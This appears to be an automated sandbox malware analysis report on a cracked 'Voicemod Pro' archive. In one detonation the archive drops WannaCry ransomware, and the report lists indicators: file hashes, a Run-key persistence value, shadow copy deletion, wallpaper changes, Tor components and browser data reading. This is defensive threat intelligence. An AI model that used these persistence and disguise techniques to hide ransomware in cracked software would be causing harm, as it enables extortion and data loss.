Malware Analysis Report

2024-12-07 02:09

Sample ID 241115-yw1alavlfl
Target Voicemod Pro by mr.motchy.rar
SHA256 7bc72601a99488910e0e3ebfd167b0e6c6a66ac7aa0de499699b7621859e320f
Tags
discovery wannacry defense_evasion execution impact persistence ransomware spyware stealer worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7bc72601a99488910e0e3ebfd167b0e6c6a66ac7aa0de499699b7621859e320f

Threat Level: Known bad

The file Voicemod Pro by mr.motchy.rar was found to be: Known bad.

Malicious Activity Summary

discovery wannacry defense_evasion execution impact persistence ransomware spyware stealer worm

Wannacry

Wannacry family

Deletes shadow copies

Drops file in Drivers directory

Drops startup file

Modifies file permissions

Adds Run key to start application

Downloads MZ/PE file

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Indicator Removal: File Deletion

Legitimate hosting services abused for malware hosting/C2

Sets desktop wallpaper using registry

Drops file in System32 directory

Loads dropped DLL

Drops file in Program Files directory

Drops file in Windows directory

Checks installed software on the system

Executes dropped EXE

Enumerates physical storage devices

Unsigned PE

Reads user/profile data of web browsers

Browser Information Discovery

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks SCSI registry key(s)

NTFS ADS

Uses Volume Shadow Copy service COM API

Views/modifies file attributes

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry key

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-15 20:09

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-15 20:08

Reported

2024-11-15 20:11

Platform

win7-20240903-en

Max time kernel

117s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodCrack\VoicemodDesktop.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodCrack\VoicemodDesktop.exe

"C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodCrack\VoicemodDesktop.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2356 -s 628

Network

N/A

Files

memory/2356-0-0x000007FEF6443000-0x000007FEF6444000-memory.dmp

memory/2356-1-0x000000013F1D0000-0x000000013F482000-memory.dmp

memory/2356-2-0x000007FEF6440000-0x000007FEF6E2C000-memory.dmp

memory/2356-3-0x000007FEF6440000-0x000007FEF6E2C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-15 20:08

Reported

2024-11-15 20:11

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodCrack\VoicemodDesktop.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodCrack\VoicemodDesktop.exe

"C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodCrack\VoicemodDesktop.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 182.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp

Files

memory/2324-0-0x00007FF9A1F83000-0x00007FF9A1F85000-memory.dmp

memory/2324-1-0x000001EA8D0F0000-0x000001EA8D3A2000-memory.dmp

memory/2324-2-0x00007FF9A1F80000-0x00007FF9A2A41000-memory.dmp

memory/2324-3-0x00007FF9A1F80000-0x00007FF9A2A41000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-15 20:08

Reported

2024-11-15 20:12

Platform

win7-20240903-en

Max time kernel

149s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5CN87.tmp\VoicemodSetup.tmp N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-5CN87.tmp\VoicemodSetup.tmp N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe

"C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe"

C:\Users\Admin\AppData\Local\Temp\is-5CN87.tmp\VoicemodSetup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-5CN87.tmp\VoicemodSetup.tmp" /SL5="$400F2,22991991,87040,C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe"

Network

N/A

Files

memory/2376-0-0x0000000000400000-0x000000000041C000-memory.dmp

memory/2376-2-0x0000000000401000-0x000000000040C000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-5CN87.tmp\VoicemodSetup.tmp

MD5 1a9f24ba757fd08f3b4db5570cd1bfd0
SHA1 6c8e5ee1db1bb8471dc2c2c7a1d9835d60df2d8d
SHA256 326071c6e04b3552414337cea066d809d987dbddbc8ad717626abc9dff748956
SHA512 bbc2bc152363d789c636941f71894b8a6062a5b37b33748c5e7eb6014bbb8ee0461c29fd892272758ece489abbe7cc4e0695f094a4963411723f698456c308a6

memory/2520-8-0x0000000000400000-0x00000000004C6000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-P4HD6.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2376-14-0x0000000000400000-0x000000000041C000-memory.dmp

memory/2520-15-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-17-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-19-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-21-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-23-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-25-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-27-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-29-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-31-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-33-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-35-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-37-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-39-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2520-41-0x0000000000400000-0x00000000004C6000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-15 20:08

Reported

2024-11-15 20:11

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe"

Signatures

Wannacry

ransomware worm wannacry

Wannacry family

wannacry

Deletes shadow copies

ransomware defense_evasion impact execution

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\SETB17.tmp C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\drivers\drmk.sys C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\drivers\portcls.sys C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\system32\drivers\SETC9D.tmp C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\drivers\drmk.sys C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\drivers\portcls.sys C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\system32\drivers\SETB17.tmp C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\system32\drivers\vmdrv.sys C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\system32\drivers\SETC9D.tmp C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\system32\drivers\vmdrv.sys C:\Windows\system32\DrvInst.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD55B4.tmp C:\Users\Admin\Downloads\WannaCry.EXE N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD55CB.tmp C:\Users\Admin\Downloads\WannaCry.EXE N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Voicemod = "\"C:\\Program Files\\Voicemod Desktop\\VoicemodDesktop.exe\"" C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\rxknciwttsoogz987 = "\"C:\\Users\\Admin\\Downloads\\tasksche.exe\"" C:\Windows\SysWOW64\reg.exe N/A

Downloads MZ/PE file

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A camo.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A camo.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2}\vmdrv.cat C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2}\SET859.tmp C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2}\SET85A.tmp C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\System32\DriverStore\drvstore.tmp C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\vmdrv.inf_amd64_7465985b33436c3c\vmdrv.sys C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\vmdrv.inf_amd64_7465985b33436c3c\vmdrv.PNF C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\vmdrv.inf_amd64_7465985b33436c3c\vmdrv.PNF C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
File created C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2}\SET848.tmp C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2}\SET859.tmp C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2}\vmdrv.inf C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\vmdrv.inf_amd64_7465985b33436c3c\vmdrv.inf C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\CatRoot2\dberr.txt C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2} C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2}\SET848.tmp C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2}\SET85A.tmp C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\vmdrv.inf_amd64_7465985b33436c3c\vmdrv.cat C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\System32\DriverStore\Temp\{a2d54076-5226-aa48-a933-3a7fd4f299a2}\vmdrv.sys C:\Windows\system32\DrvInst.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\Downloads\@[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" C:\Users\Admin\Downloads\WannaCry.EXE N/A

Checks installed software on the system

discovery

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Voicemod Desktop\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\lib\is-OJCHA.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\lib\is-85JK1.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\ru\is-RTRJI.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\lib\NAudio.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\ko\is-TKNHH.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\ko\is-JPU75.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\Resources\DefaultSounds\44100\is-1HQUK.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\es\SimpleConverter.resources.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\pt\VoicemodDesktop.resources.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\driver\is-N1JNR.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\is-A0KL8.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\is-2GT01.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\de\is-1MQ0T.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\lib\Hardcodet.Wpf.TaskbarNotification.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\de\VoicemodDesktop.resources.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\lib\is-PN2K5.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\Resources\DefaultSounds\48000\is-66T7R.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\is-9DUP5.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\de\is-DR5RG.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\driver\uninstalldriver.log C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Voicemod Desktop\lib\WpfAnimatedGif.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\fr\SimpleConverter.resources.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\ko\AutoUpdater.NET.resources.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\fr\AutoUpdater.NET.resources.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\lib\is-6Q181.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\lib\is-LP7TB.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\lib\is-1HGP6.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\es\is-NMCJH.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\zh\AutoUpdater.NET.resources.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\pt\is-1SJNR.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\driver\is-4BKBK.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\driver\is-8NGH1.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\lib\is-7EM6K.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\es\AutoUpdater.NET.resources.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\lib\VoicemodControls.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\ru\VoicemodDesktop.resources.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\lib\is-EGR5F.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\lib\is-RTML3.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\lib\is-0E9QR.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\lib\GoogleAnalytics.Core.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\es\VoicemodDesktop.resources.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\ru\SimpleConverter.resources.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\driver\is-KN36C.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\lib\is-6IQCO.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\zh\is-M67TM.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\fr\is-F9T2F.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\ko\is-HSLPH.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\lib\Newtonsoft.Json.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\lib\VoicemodSDKDotNET.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\lib\is-VOAHE.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\zh\is-EBR74.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\ru\is-KIFQ0.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\fr\is-UQ37V.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\pt\is-FGTO9.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\lib\AutoUpdater.NET.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\zh\SimpleConverter.resources.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\ko\SimpleConverter.resources.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\pt\SimpleConverter.resources.dll C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\lib\is-JBBHD.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\zh\is-PBNMS.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File created C:\Program Files\Voicemod Desktop\fr\is-B9DQ9.tmp C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
File opened for modification C:\Program Files\Voicemod Desktop\driver\DriverPackageUninstall.exe C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\INF\oem0.PNF C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\inf\oem3.inf C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\inf\oem3.inf C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\INF\oem1.PNF C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
File created C:\Windows\INF\oem2.PNF C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
File created C:\Windows\INF\c_media.PNF C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
N/A N/A C:\Windows\Temp\{ED2F5488-7C7E-4D98-84D2-349C48F9B791}\.cr\vc_redist.x64.exe N/A
N/A N/A C:\Windows\Temp\{A60A61C6-DF86-4316-AE12-9063B8D5B120}\.cr\vc_redist.x86.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Reads user/profile data of web browsers

spyware stealer

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Temp\{ED2F5488-7C7E-4D98-84D2-349C48F9B791}\.cr\vc_redist.x64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\@[email protected] N/A
